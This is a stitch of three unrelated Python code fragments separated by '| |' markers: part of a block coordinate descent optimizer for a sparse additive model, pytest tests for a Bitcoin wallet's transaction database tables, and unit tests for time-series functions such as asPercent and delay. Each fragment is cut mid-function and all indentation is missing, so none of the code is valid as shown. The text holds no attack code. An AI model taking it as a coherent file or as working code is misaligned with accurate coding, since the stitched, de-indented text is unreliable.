beta: Updated coefficients for main effects, list of arrays of shapes [(Ki+1, 1), ...].
zeta: Updated binary vector to track which main effects are in the active set, a bool array of shape (1, d)
"""
N = Y.shape[0]
delta = beta[1]
beta = beta[0]
alpha = zeta[1]
zeta = zeta[0]
active_interaction_set = active_set[1]
active_set = active_set[0]
Bspam = B
Bspam_interaction = B_interaction
Pspam = P
Pspam_interaction = P_interaction
d = I[0]
dinteraction = I[1]
debugging_mode = False
eps = 1e-8
J = 0.5*mean_squared_error(Y, Ypred)+\
lam[0]*sum([(np.transpose(beta[k])).dot(S[k].dot(beta[k]))[0,0] for k in active_set])+\
lam[0]*sum([(np.transpose(delta[k])).dot(S_interaction[k].dot(delta[k]))[0,0] for k in active_interaction_set])+\
eps*sum([np.dot(beta[k][:,0],beta[k][:,0]) for k in active_set])+\
eps*sum([np.dot(delta[k][:,0],delta[k][:,0]) for k in active_interaction_set])+\
lam[1]*(np.count_nonzero(zeta[0,:]))+\
r*lam[1]*(np.count_nonzero(alpha[0,:]))
J_initial = deepcopy(J)
active_set_update = np.array([x for x in active_set if x not in np.where(zeta[0,:] == 1)[0]])
active_interaction_set_update = np.array([x for x in active_interaction_set if x not in np.where(alpha[0,:] == 1)[0]])
if verbose == True:
display(Math(r'Input~Obj: {:.0f},'.format(J)+'\sum_{j \in S^c} z_j: '+'{} \leq {}.'.format(np.count_nonzero(zeta[0,:]), len(active_set))+'\sum_{ij \in S^c} z_{ij}: '+'{} \leq {}.'.format(np.count_nonzero(alpha[0,:]),len(active_interaction_set))))
for it in range(max_iter):
for j in active_set:
if zeta[0,j]==True:
Ypred -= Bspam[j].dot(beta[j])
res = Y-Ypred
beta[j], zeta[:,j] = utilities.solve(B = Bspam[j], P = Pspam[j], y = res, beta = beta[j], S=S[j], lam = [lam[0], lam[1]])
if zeta[0,j]==True:
Ypred += Bspam[j].dot(beta[j])
for j in active_interaction_set:
if alpha[0,j]==True:
Ypred -= Bspam_interaction[j].dot(delta[j])
res = Y-Ypred
delta[j], alpha[:,j] = utilities.solve(B = Bspam_interaction[j], P = Pspam_interaction[j], y = res, beta = delta[j], S=S_interaction[j], lam = [lam[0], r*lam[1]])
if alpha[0,j]==True:
Ypred += Bspam_interaction[j].dot(delta[j])
J_prev = deepcopy(J)
J = 0.5*mean_squared_error(Y, Ypred)+\
lam[0]*sum([(np.transpose(beta[k])).dot(S[k].dot(beta[k]))[0,0] for k in active_set])+\
lam[0]*sum([(np.transpose(delta[k])).dot(S_interaction[k].dot(delta[k]))[0,0] for k in active_interaction_set])+\
eps*sum([np.dot(beta[k][:,0],beta[k][:,0]) for k in active_set])+\
eps*sum([np.dot(delta[k][:,0],delta[k][:,0]) for k in active_interaction_set])+\
lam[1]*(np.count_nonzero(zeta[0,:]))+\
r*lam[1]*(np.count_nonzero(alpha[0,:]))
if J>10*J_initial:
beta = [np.zeros(bb.shape,dtype=float) for bb in beta]
delta = [np.zeros(dd.shape,dtype=float) for dd in delta]
Ypred = np.mean(Y)*np.ones(Y.shape,dtype=float)
J_initial = 0.5*mean_squared_error(Y, Ypred)+\
lam[0]*sum([(np.transpose(beta[k])).dot(S[k].dot(beta[k]))[0,0] for k in active_set])+\
lam[0]*sum([(np.transpose(delta[k])).dot(S_interaction[k].dot(delta[k]))[0,0] for k in active_interaction_set])+\
eps*sum([np.dot(beta[k][:,0],beta[k][:,0]) for k in active_set])+\
eps*sum([np.dot(delta[k][:,0],delta[k][:,0]) for k in active_interaction_set])+\
lam[1]*(np.count_nonzero(zeta[0,:]))+\
r*lam[1]*(np.count_nonzero(alpha[0,:]))
debugging_mode = True
# for i in active_set_update:
# Pspam[i] = sp.linalg.splu((Bspam[i].transpose()).dot(Bspam[i])+2*N*(lam[0]*S[i]+eps*sp.csr_matrix(np.identity(Bspam[i].shape[1]))))
# for i in active_interaction_set_update:
# Pspam_interaction[i] = sp.linalg.splu((Bspam_interaction[i].transpose()).dot(Bspam_interaction[i])+2*N*(lam[0]*S_interaction[i]+eps*sp.csr_matrix(np.identity(Bspam_interaction[i].shape[1]))))
continue
J_del = J-J_prev
if debugging_mode == True:
print('Debugging, lambda_1:{:.6f}, lambda_2:{:.6f}, J: {:.5f}, |Delta J/J|: {:.4f}, '.format(lam[0], lam[1], J, np.absolute(J_del/J)))
if np.absolute(J_del/J)<tol:
break
if verbose == True:
display(Math(r'Output~Obj: {:.0f}, |\Delta J/J|: {:.4f}, '.format(J, np.absolute(J_del/J))+'\sum_{j \in S^c} z_j: '+'{} \leq {}.'.format(np.count_nonzero(zeta[0,:]), len(active_set))+'\sum_{ij \in S^c} z_{ij}: '+'{} \leq {}.'.format(np.count_nonzero(alpha[0,:]),len(active_interaction_set))))
if(it == max_iter-1):
with open(path+'/Warning.txt', "a") as f:
f.write('Warning: CD over active set did not converge within the chosen max_iter!')
return Ypred, beta, zeta, delta, alpha
def CD_Joint(CD_J_AS = None,
Ypred = None,
beta = None,
zeta = None,
active_set = None,
lam = None,
P = None,
P_interaction = None,
Y = None,
B = None,
B_interaction = None,
S = None,
S_interaction = None,
I = None,
interaction_terms = None,
r = None,
max_iter = None,
tol = 1e-4,
full_set = None,
MaxSuppSize_main = None,
MaxSuppSize_interaction = None,
verbose = False,
path = None):
"""Cyclic Block Coordinate Descent over the full set of main/interaction effects.
Args:
CD_J_AS: a callable function that optimizes over a reduced set of main effects, callable.
Ypred: numpy array of shape (N, ).
beta: coefficients for main/interaction effects, 2 lists of arrays of shapes [ [(Ki+1, 1), ...], [(Kij+1, 1), ...]]
zeta: binary vector to track which main effects are in the active set, 2 bool arrays of shape [(1, d), (1, Imax)]
active_set: indices of main effects to optimize over, a numpy int array.
lam: regularization parameters [lam_1, lam_2], list of floats.
P: B^T*B + 2*N*(lam_1*S_i + eps*I) matrices for main effects, list of sparse matrices of shapes [(Ki+1, Ki+1), ...].
eps is a small epsilon for numerical stability.
P_interaction: B^T*B + 2*N*(lam_1*S_ij + eps*I) matrices for main effects, list of sparse matrices of shapes [(Kij+1, Kij+1), ...].
eps is a small epsilon for numerical stability.
Y: training target responses, a float numpy array of shape (N,).
B: B-spline transformed sparse matrices for main effects, list of sparse matrices of shapes [(N, Ki+1), ...].
B_interaction: B-spline transformed sparse matrices for interaction effects, list of sparse matrices of shapes [(N, Kij+1), ...].
S: Smoothness matrices for main effects, list of sparse matrices of shapes [(Ki+1, Ki+1), ...].
S_interaction: Smoothness matrices for interaction effects, list of sparse matrices of shapes [(Kij+1, Kij+1), ...].
I: number of possible main/interaction effects, int scalers.
interaction_terms: list of interaction effects to consider if only a subset need to be considered,
a 2D numpy array of of shape (Imax, 2).
r: relative scaling factor for L0 penalty between main and interaction effects.
We consider r=1.0 (corresponds to alpha symbol in the paper), float scaler.
max_iter: maximum number of Cyclic BCD on the active set, int scaler.
tol: relative loss termination criteria for stopping, a float scalar.
full_set: indices of all main effects, a numpy int array.
main_terms: list of main effects to consider if only a subset need to be considered,
not supported yet.
MaxSuppSize_main: Stop L0 regularization if the active set of main effects is larger than the MaxSuppSize_main
and move to next smoothing lambda setting and start L0 regularization, int scaler.
MaxSuppSize_interaction: Stop L0 regularization if the active set of interaction effects is larger than the MaxSuppSize_interaction
and move to next smoothing lambda setting and start L0 regularization, int scaler.
verbose: for printing optimization steps, bool scaler.
path: for logging, str.
Returns:
Ypred: Updated prediction, numpy array of shape (N, ).
beta: Updated coefficients for main effects, list of arrays of shapes [(Ki+1, 1), ...].
zeta: Updated binary vector to track | |
completion_callback=writer.get_callback())
assert writer.succeeded()
# Ensure that a unset bytedata flag requires bytedata to not be included.
with pytest.raises(AssertionError):
self.store.update([(tx_hash, tx_data, tx_bytes, TxFlags.Unset)])
@pytest.mark.timeout(8)
def test_update__entry_with_magic_bytedata_and_set_flag(self):
tx_bytes = os.urandom(10)
tx_hash = bitcoinx.double_sha256(tx_bytes)
tx_data = TxData(height=None, fee=2, position=None, date_added=1, date_updated=1)
row = (tx_hash, tx_data, tx_bytes, TxFlags.HasByteData, None)
with SynchronousWriter() as writer:
self.store.create([ row ], completion_callback=writer.get_callback())
assert writer.succeeded()
# Ensure that the magic bytedata requires a set bytedata flag.
with pytest.raises(AssertionError):
self.store.update([(tx_hash, tx_data, MAGIC_UNTOUCHED_BYTEDATA, TxFlags.Unset)])
@pytest.mark.timeout(8)
def test_update__with_valid_magic_bytedata(self):
tx_bytes = os.urandom(10)
tx_hash = bitcoinx.double_sha256(tx_bytes)
tx_data = TxData(height=None, fee=2, position=None, date_added=1, date_updated=1)
row = (tx_hash, tx_data, tx_bytes, TxFlags.HasByteData, None)
with SynchronousWriter() as writer:
self.store.create([ row ], completion_callback=writer.get_callback())
assert writer.succeeded()
# Ensure that
with SynchronousWriter() as writer:
self.store.update([(tx_hash, tx_data, MAGIC_UNTOUCHED_BYTEDATA, TxFlags.HasByteData)],
completion_callback=writer.get_callback())
assert writer.succeeded()
rows = self.store.read()
assert 1 == len(rows)
get_tx_hash, bytedata_get, flags_get, metadata_get = rows[0]
assert tx_bytes == bytedata_get
assert flags_get & TxFlags.HasByteData != 0
@pytest.mark.timeout(8)
def test_update_flags(self):
bytedata = os.urandom(10)
tx_hash = bitcoinx.double_sha256(bytedata)
metadata = TxData(height=1, fee=2, position=None, date_added=1, date_updated=1)
with SynchronousWriter() as writer:
self.store.create([ (tx_hash, metadata, bytedata, TxFlags.Unset, None) ],
completion_callback=writer.get_callback())
assert writer.succeeded()
# Verify the field flags are assigned correctly on the add.
expected_flags = TxFlags.HasByteData | TxFlags.HasFee | TxFlags.HasHeight
_tx_hash, flags, _metadata = self.store.read_metadata(tx_hashes=[tx_hash])[0]
assert expected_flags == flags, f"expected {expected_flags!r}, got {TxFlags.to_repr(flags)}"
flags = TxFlags.StateReceived
mask = TxFlags.METADATA_FIELD_MASK | TxFlags.HasByteData | TxFlags.HasProofData
date_updated = 1
with SynchronousWriter() as writer:
self.store.update_flags([ (tx_hash, flags, mask, date_updated) ],
completion_callback=writer.get_callback())
assert writer.succeeded()
# Verify the state flag is correctly added via the mask.
_tx_hash, flags_get, _metadata = self.store.read_metadata(tx_hashes=[tx_hash])[0]
expected_flags |= TxFlags.StateReceived
assert expected_flags == flags_get, \
f"{TxFlags.to_repr(expected_flags)} != {TxFlags.to_repr(flags_get)}"
flags = TxFlags.StateReceived
mask = TxFlags.Unset
date_updated = 1
with SynchronousWriter() as writer:
self.store.update_flags([ (tx_hash, flags, mask, date_updated) ],
completion_callback=writer.get_callback())
assert writer.succeeded()
# Verify the state flag is correctly set via the mask.
_tx_hash, flags, _metadata = self.store.read_metadata(tx_hashes=[tx_hash])[0]
assert TxFlags.StateReceived == flags
@pytest.mark.timeout(8)
def test_delete(self) -> None:
to_add = []
for i in range(10):
bytedata = os.urandom(10)
tx_hash = bitcoinx.double_sha256(bytedata)
metadata = TxData(height=1, fee=2, position=None, date_added=1, date_updated=1)
to_add.append((tx_hash, metadata, bytedata, TxFlags.Unset, None))
with SynchronousWriter() as writer:
self.store.create(to_add, completion_callback=writer.get_callback())
assert writer.succeeded()
add_hashes = set(t[0] for t in to_add)
get_hashes = set(self._get_store_hashes())
assert add_hashes == get_hashes
with SynchronousWriter() as writer:
self.store.delete(add_hashes, completion_callback=writer.get_callback())
assert writer.succeeded()
get_hashes = self._get_store_hashes()
assert 0 == len(get_hashes)
@pytest.mark.timeout(8)
def test_get_all_pending(self):
get_tx_hashes = set([])
for tx_hex in (tx_hex_1, tx_hex_2):
bytedata = bytes.fromhex(tx_hex)
tx_hash = bitcoinx.double_sha256(bytedata)
metadata = TxData(height=1, fee=2, position=None, date_added=1, date_updated=1)
with SynchronousWriter() as writer:
self.store.create([ (tx_hash, metadata, bytedata, TxFlags.Unset, None) ],
completion_callback=writer.get_callback())
assert writer.succeeded()
get_tx_hashes.add(tx_hash)
result_tx_hashes = set(self._get_store_hashes())
assert get_tx_hashes == result_tx_hashes
@pytest.mark.timeout(8)
def test_get(self):
bytedata = os.urandom(10)
tx_hash = bitcoinx.double_sha256(bytedata)
metadata = TxData(height=1, fee=2, position=None, date_added=1, date_updated=1)
with SynchronousWriter() as writer:
self.store.create([ (tx_hash, metadata, bytedata, TxFlags.Unset, None) ],
completion_callback=writer.get_callback())
assert writer.succeeded()
assert tx_hash in self._get_store_hashes()
assert self.store.read(tx_hashes=[tx_hash])
assert self.store.read(TxFlags.HasByteData, TxFlags.HasByteData, [tx_hash])
@pytest.mark.timeout(8)
def test_read_metadata(self) -> None:
# We're going to add five matches and look for two of them, checking that we do not match
# unwanted rows.
all_tx_hashes = []
datas = []
for i in range(5):
bytedata = os.urandom(10)
tx_hash = bitcoinx.double_sha256(bytedata)
metadata = TxData(height=i*100, fee=i*1000, position=None, date_added=1, date_updated=1)
datas.append((tx_hash, metadata, bytedata, TxFlags.Unset, None))
all_tx_hashes.append(tx_hash)
with SynchronousWriter() as writer:
self.store.create(datas, completion_callback=writer.get_callback())
assert writer.succeeded()
# We also ask for a dud tx_hash that won't get matched.
select_tx_hashes = [ all_tx_hashes[0], all_tx_hashes[3], b"12121212" ]
rowdatas = self.store.read_metadata(tx_hashes=select_tx_hashes)
# Check that the two valid matches are there and their values match the projected values.
assert len(rowdatas) == 2
for rowdata in rowdatas:
tx_hash = rowdata[0]
tx_flags = rowdata[1]
metadata = rowdata[2]
rowidx = all_tx_hashes.index(tx_hash)
assert metadata.height == rowidx * 100
assert metadata.fee == rowidx * 1000
assert metadata.position is None
@pytest.mark.timeout(8)
def test_update_metadata(self) -> None:
# We're going to add five matches and look for two of them, checking that we do not match
# unwanted rows.
tx_hashes = []
datas = []
for i in range(5):
bytedata = os.urandom(10)
tx_hash = bitcoinx.double_sha256(bytedata)
metadata = TxData(height=i*100, fee=i*1000, position=None, date_added=1, date_updated=1)
datas.append((tx_hash, metadata, bytedata, TxFlags.Unset, None))
tx_hashes.append(tx_hash)
with SynchronousWriter() as writer:
self.store.create(datas, completion_callback=writer.get_callback())
assert writer.succeeded()
updates = []
for i in range(5):
tx_hash = tx_hashes[i]
metadata = TxData(height=i*200, fee=i*2000, position=None, date_added=1, date_updated=1)
updates.append((tx_hash, metadata, TxFlags.HasHeight | TxFlags.HasFee))
with SynchronousWriter() as writer:
self.store.update_metadata(updates, completion_callback=writer.get_callback())
assert writer.succeeded()
# We also ask for a dud tx_hash that won't get matched.
select_tx_hashes = [ tx_hashes[0], tx_hashes[3], b"12121212" ]
rowdatas = self.store.read_metadata(tx_hashes=select_tx_hashes)
# Check that the two valid matches are there and their values match the projected values.
assert len(rowdatas) == 2
for rowdata in rowdatas:
tx_hash = rowdata[0]
tx_flags = rowdata[1]
metadata = rowdata[2]
rowidx = tx_hashes.index(tx_hash)
assert metadata.height == rowidx * 200
assert metadata.fee == rowidx * 2000
assert metadata.position is None
@pytest.mark.timeout(8)
def test_read(self):
to_add = []
for i in range(10):
tx_bytes = os.urandom(10)
tx_hash = bitcoinx.double_sha256(tx_bytes)
tx_data = TxData(height=None, fee=2, position=None, date_added=1, date_updated=1)
to_add.append((tx_hash, tx_data, tx_bytes, TxFlags.HasFee, None))
with SynchronousWriter() as writer:
self.store.create(to_add, completion_callback=writer.get_callback())
assert writer.succeeded()
# Test the first "add" hash is matched.
matches = self.store.read(tx_hashes=[to_add[0][0]])
assert to_add[0][0] == matches[0][0]
# Test no id is matched.
matches = self.store.read(tx_hashes=[b"aaaa"])
assert 0 == len(matches)
# Test flag and mask combinations.
matches = self.store.read(flags=TxFlags.HasFee)
assert 10 == len(matches)
matches = self.store.read(flags=TxFlags.Unset, mask=TxFlags.HasHeight)
assert 10 == len(matches)
matches = self.store.read(flags=TxFlags.HasFee, mask=TxFlags.HasFee)
assert 10 == len(matches)
matches = self.store.read(flags=TxFlags.Unset, mask=TxFlags.HasFee)
assert 0 == len(matches)
@pytest.mark.timeout(8)
def test_proof(self):
bytedata = os.urandom(10)
tx_hash = bitcoinx.double_sha256(bytedata)
metadata = TxData(height=1, fee=2, position=None, date_added=1, date_updated=1)
with SynchronousWriter() as writer:
self.store.create([ (tx_hash, metadata, bytedata, 0, None) ],
completion_callback=writer.get_callback())
assert writer.succeeded()
position1 = 10
merkle_branch1 = [ os.urandom(32) for i in range(10) ]
proof = TxProof(position1, merkle_branch1)
date_updated = 1
with SynchronousWriter() as writer:
self.store.update_proof([ (tx_hash, proof, date_updated) ],
completion_callback=writer.get_callback())
assert writer.succeeded()
rows = self.store.read_proof([ self.tx_hash ])
assert len(rows) == 0
db_tx_hash, (tx_position2, merkle_branch2) = self.store.read_proof([ tx_hash ])[0]
assert db_tx_hash == tx_hash
assert position1 == tx_position2
assert merkle_branch1 == merkle_branch2
@pytest.mark.timeout(8)
def test_labels(self):
bytedata_1 = os.urandom(10)
tx_hash_1 = bitcoinx.double_sha256(bytedata_1)
metadata_1 = TxData(height=1, fee=2, position=None, date_added=1, date_updated=1)
bytedata_2 = os.urandom(10)
tx_hash_2 = bitcoinx.double_sha256(bytedata_2)
metadata_2 = TxData(height=1, fee=2, position=None, date_added=1, date_updated=1)
with SynchronousWriter() as writer:
self.store.create([ (tx_hash_1, metadata_1, bytedata_1, 0, None),
(tx_hash_2, metadata_2, bytedata_2, 0, None) ],
completion_callback=writer.get_callback())
assert writer.succeeded()
with SynchronousWriter() as writer:
self.store.update_descriptions([ ("tx 1", tx_hash_1) ],
completion_callback=writer.get_callback())
assert writer.succeeded()
rows = self.store.read_descriptions()
assert len(rows) == 1
assert len([r[1] == "tx 1" for r in rows if r[0] == tx_hash_1]) == 1
with SynchronousWriter() as writer:
self.store.update_descriptions([ (None, tx_hash_1), ("tx 2", tx_hash_2) ],
completion_callback=writer.get_callback())
assert writer.succeeded()
rows = self.store.read_descriptions([ tx_hash_2 ])
assert len(rows) == 1
assert rows[0][0] == tx_hash_2 and rows[0][1] == "tx 2"
# Reading entries for a non-existent ...
rows = self.store.read_descriptions([ self.tx_hash ])
assert len(rows) == 0
@pytest.mark.timeout(8)
def test_table_transactionoutputs_crud(db_context: DatabaseContext) -> None:
table = TransactionOutputTable(db_context)
assert [] == table.read()
table._get_current_timestamp = lambda: 10
TX_BYTES = os.urandom(10)
TX_HASH = bitcoinx.double_sha256(TX_BYTES)
TX_INDEX = 1
TXOUT_FLAGS = 1 << 15
KEYINSTANCE_ID = 1
ACCOUNT_ID = 10
MASTERKEY_ID = 20
DERIVATION_DATA1 = b'111'
DERIVATION_DATA2 = b'222'
SCRIPT_TYPE = 40
line1 = (TX_HASH, TX_INDEX, 100, KEYINSTANCE_ID, TXOUT_FLAGS)
line2 = (TX_HASH, TX_INDEX+1, 200, KEYINSTANCE_ID, TXOUT_FLAGS)
# No effect: The transactionoutput foreign key constraint will fail as the transactionoutput
# does not exist.
with pytest.raises(sqlite3.IntegrityError):
with SynchronousWriter() as writer:
table.create([ line1 ], completion_callback=writer.get_callback())
assert not writer.succeeded()
# Satisfy the transaction foreign key constraint by creating the transaction.
transaction_table = TransactionTable(db_context)
with SynchronousWriter() as writer:
transaction_table.create([ (TX_HASH, TxData(height=1, fee=2, position=None, date_added=1,
date_updated=1), TX_BYTES, TxFlags.HasByteData|TxFlags.HasFee|TxFlags.HasHeight,
None) ],
completion_callback=writer.get_callback())
assert writer.succeeded()
# Satisfy the masterkey foreign key constraint by creating the masterkey.
masterkey_table = MasterKeyTable(db_context)
with SynchronousWriter() as writer:
masterkey_table.create([ (MASTERKEY_ID, None, 2, b'111') ],
completion_callback=writer.get_callback())
assert writer.succeeded()
# Satisfy the account foreign key constraint by creating the account.
account_table = AccountTable(db_context)
with SynchronousWriter() as writer:
account_table.create([ (ACCOUNT_ID, MASTERKEY_ID, ScriptType.P2PKH, 'name') ],
completion_callback=writer.get_callback())
assert writer.succeeded()
# Satisfy the keyinstance foreign key constraint by creating the keyinstance.
keyinstance_table = KeyInstanceTable(db_context)
with SynchronousWriter() as writer:
keyinstance_table.create([ (KEYINSTANCE_ID, ACCOUNT_ID, MASTERKEY_ID,
DerivationType.BIP32, DERIVATION_DATA1, SCRIPT_TYPE, True, | |
source = [
TimeSeries('collectd.test-db1.load.value',0,1,1,[range(18)] + [None, None]),
]
delay = 2
expectedList = [
TimeSeries('delay(collectd.test-db1.load.value,2)',0,1,1,[None, None] + [range(18)]),
]
gotList = functions.delay({}, source, delay)
self.assertEqual(len(gotList), len(expectedList))
for got, expected in zip(gotList, expectedList):
self.assertListEqual(got, expected)
def test_asPercent_error(self):
seriesList = [
TimeSeries('collectd.test-db1.load.value',0,1,1,[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]),
TimeSeries('collectd.test-db2.load.value',0,1,1,[None,2,None,4,None,6,None,8,None,10,None,12,None,14,None,16,None,18,None,20]),
TimeSeries('collectd.test-db3.load.value',0,1,1,[1,2,None,None,None,6,7,8,9,10,11,12,13,14,15,16,17,None,None,None]),
TimeSeries('collectd.test-db4.load.value',0,1,1,[1,2,3,4,None,6,None,None,9,10,11,None,13,None,None,None,None,18,19,20]),
TimeSeries('collectd.test-db5.load.value',0,1,1,[1,2,None,None,None,6,7,8,9,10,11,12,13,14,15,16,17,18,None,None]),
]
seriesList2 = [
TimeSeries('collectd.test-db1.load.value',0,1,1,[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]),
TimeSeries('collectd.test-db1.load.value',0,1,1,[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]),
]
with self.assertRaisesRegexp(ValueError, "asPercent second argument must be missing, a single digit, reference exactly 1 series or reference the same number of series as the first argument"):
functions.asPercent({}, seriesList, seriesList2)
def test_asPercent_no_seriesList2(self):
seriesList = [
TimeSeries('collectd.test-db1.load.value',0,1,1,[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]),
TimeSeries('collectd.test-db2.load.value',0,1,1,[None,2,None,4,None,6,None,8,None,10,None,12,None,14,None,16,None,18,None,20]),
TimeSeries('collectd.test-db3.load.value',0,1,1,[1,2,None,None,None,6,7,8,9,10,11,12,13,14,15,16,17,None,None,None]),
TimeSeries('collectd.test-db4.load.value',0,1,1,[1,2,3,4,None,6,None,None,9,10,11,None,13,None,None,None,None,18,19,20]),
TimeSeries('collectd.test-db5.load.value',0,1,1,[1,2,None,None,None,6,7,8,9,10,11,12,13,14,15,16,17,18,None,None]),
]
for series in seriesList:
series.pathExpression = series.name
expectedResult = [
TimeSeries('asPercent(collectd.test-db1.load.value,sumSeries(collectd.test-db1.load.value,collectd.test-db2.load.value,collectd.test-db3.load.value,collectd.test-db4.load.value,collectd.test-db5.load.value))',0,1,1,[25.0, 20.0, 50.0, 33.33, 100.0, 20.0, 33.33, 25.0, 25.0, 20.0, 25.0, 25.0, 25.0, 25.0, 33.33, 25.0, 33.33, 25.0, 50.0, 33.33]),
TimeSeries('asPercent(collectd.test-db2.load.value,sumSeries(collectd.test-db1.load.value,collectd.test-db2.load.value,collectd.test-db3.load.value,collectd.test-db4.load.value,collectd.test-db5.load.value))',0,1,1,[None, 20.0, None, 33.33, None, 20.0, None, 25.0, None, 20.0, None, 25.0, None, 25.0, None, 25.0, None, 25.0, None, 33.33]),
TimeSeries('asPercent(collectd.test-db3.load.value,sumSeries(collectd.test-db1.load.value,collectd.test-db2.load.value,collectd.test-db3.load.value,collectd.test-db4.load.value,collectd.test-db5.load.value))',0,1,1,[25.0, 20.0, None, None, None, 20.0, 33.33, 25.0, 25.0, 20.0, 25.0, 25.0, 25.0, 25.0, 33.33, 25.0, 33.33, None, None, None]),
TimeSeries('asPercent(collectd.test-db4.load.value,sumSeries(collectd.test-db1.load.value,collectd.test-db2.load.value,collectd.test-db3.load.value,collectd.test-db4.load.value,collectd.test-db5.load.value))',0,1,1,[25.0, 20.0, 50.0, 33.33, None, 20.0, None, None, 25.0, 20.0, 25.0, None, 25.0, None, None, None, None, 25.0, 50.0, 33.33]),
TimeSeries('asPercent(collectd.test-db5.load.value,sumSeries(collectd.test-db1.load.value,collectd.test-db2.load.value,collectd.test-db3.load.value,collectd.test-db4.load.value,collectd.test-db5.load.value))',0,1,1,[25.0, 20.0, None, None, None, 20.0, 33.33, 25.0, 25.0, 20.0, 25.0, 25.0, 25.0, 25.0, 33.33, 25.0, 33.33, 25.0, None, None]),
]
result = functions.asPercent({}, seriesList)
for i, series in enumerate(result):
for k, v in enumerate(series):
if type(v) is float:
series[k] = round(v,2)
self.assertEqual(result, expectedResult)
def test_asPercent_integer(self):
seriesList = [
TimeSeries('collectd.test-db1.load.value',0,1,1,[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]),
TimeSeries('collectd.test-db2.load.value',0,1,1,[None,2,None,4,None,6,None,8,None,10,None,12,None,14,None,16,None,18,None,20]),
TimeSeries('collectd.test-db3.load.value',0,1,1,[1,2,None,None,None,6,7,8,9,10,11,12,13,14,15,16,17,None,None,None]),
TimeSeries('collectd.test-db4.load.value',0,1,1,[1,2,3,4,None,6,None,None,9,10,11,None,13,None,None,None,None,18,19,20]),
TimeSeries('collectd.test-db5.load.value',0,1,1,[1,2,None,None,None,6,7,8,9,10,11,12,13,14,15,16,17,18,None,None]),
]
expectedResult = [
TimeSeries('asPercent(collectd.test-db1.load.value,10)',0,1,1,[10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0, 110.0, 120.0, 130.0, 140.0, 150.0, 160.0, 170.0, 180.0, 190.0, 200.0]),
TimeSeries('asPercent(collectd.test-db2.load.value,10)',0,1,1,[None, 20.0, None, 40.0, None, 60.0, None, 80.0, None, 100.0, None, 120.0, None, 140.0, None, 160.0, None, 180.0, None, 200.0]),
TimeSeries('asPercent(collectd.test-db3.load.value,10)',0,1,1,[10.0, 20.0, None, None, None, 60.0, 70.0, 80.0, 90.0, 100.0, 110.0, 120.0, 130.0, 140.0, 150.0, 160.0, 170.0, None, None, None]),
TimeSeries('asPercent(collectd.test-db4.load.value,10)',0,1,1,[10.0, 20.0, 30.0, 40.0, None, 60.0, None, None, 90.0, 100.0, 110.0, None, 130.0, None, None, None, None, 180.0, 190.0, 200.0]),
TimeSeries('asPercent(collectd.test-db5.load.value,10)',0,1,1,[10.0, 20.0, None, None, None, 60.0, 70.0, 80.0, 90.0, 100.0, 110.0, 120.0, 130.0, 140.0, 150.0, 160.0, 170.0, 180.0, None, None])
]
result = functions.asPercent({}, seriesList, 10)
for i, series in enumerate(result):
for k, v in enumerate(series):
if type(v) is float:
series[k] = round(v,2)
self.assertEqual(result, expectedResult)
def test_asPercent_seriesList2_single(self):
seriesList = [
TimeSeries('collectd.test-db1.load.value',0,1,1,[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]),
TimeSeries('collectd.test-db2.load.value',0,1,1,[None,2,None,4,None,6,None,8,None,10,None,12,None,14,None,16,None,18,None,20]),
TimeSeries('collectd.test-db3.load.value',0,1,1,[1,2,None,None,None,6,7,8,9,10,11,12,13,14,15,16,17,None,None,None]),
TimeSeries('collectd.test-db4.load.value',0,1,1,[1,2,3,4,None,6,None,None,9,10,11,None,13,None,None,None,None,18,19,20]),
TimeSeries('collectd.test-db5.load.value',0,1,1,[1,2,None,None,None,6,7,8,9,10,11,12,13,14,15,16,17,18,None,None]),
]
seriesList2 = [
TimeSeries('collectd.test-db1.load.value',0,1,1,[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]),
]
expectedResult = [
TimeSeries('asPercent(collectd.test-db1.load.value,collectd.test-db1.load.value)',0,1,1,[100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0]),
TimeSeries('asPercent(collectd.test-db2.load.value,collectd.test-db1.load.value)',0,1,1,[None, 100.0, None, 100.0, None, 100.0, None, 100.0, None, 100.0, None, 100.0, None, 100.0, None, 100.0, None, 100.0, None, 100.0]),
TimeSeries('asPercent(collectd.test-db3.load.value,collectd.test-db1.load.value)',0,1,1,[100.0, 100.0, None, None, None, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, None, None, None]),
TimeSeries('asPercent(collectd.test-db4.load.value,collectd.test-db1.load.value)',0,1,1,[100.0, 100.0, 100.0, 100.0, None, 100.0, None, None, 100.0, 100.0, 100.0, None, 100.0, None, None, None, None, 100.0, 100.0, 100.0]),
TimeSeries('asPercent(collectd.test-db5.load.value,collectd.test-db1.load.value)',0,1,1,[100.0, 100.0, None, None, None, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, None, None])
]
result = functions.asPercent({}, seriesList, seriesList2)
for i, series in enumerate(result):
for k, v in enumerate(series):
if type(v) is float:
series[k] = round(v,2)
self.assertEqual(result, expectedResult)
def test_asPercent_seriesList2_multi(self):
seriesList = [
TimeSeries('collectd.test-db1.load.value',0,1,1,[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]),
TimeSeries('collectd.test-db2.load.value',0,1,1,[None,2,None,4,None,6,None,8,None,10,None,12,None,14,None,16,None,18,None,20]),
TimeSeries('collectd.test-db3.load.value',0,1,1,[1,2,None,None,None,6,7,8,9,10,11,12,13,14,15,16,17,None,None,None]),
TimeSeries('collectd.test-db4.load.value',0,1,1,[1,2,3,4,None,6,None,None,9,10,11,None,13,None,None,None,None,18,19,20]),
TimeSeries('collectd.test-db5.load.value',0,1,1,[1,2,None,None,None,6,7,8,9,10,11,12,13,14,15,16,17,18,None,None]),
]
seriesList2 = [
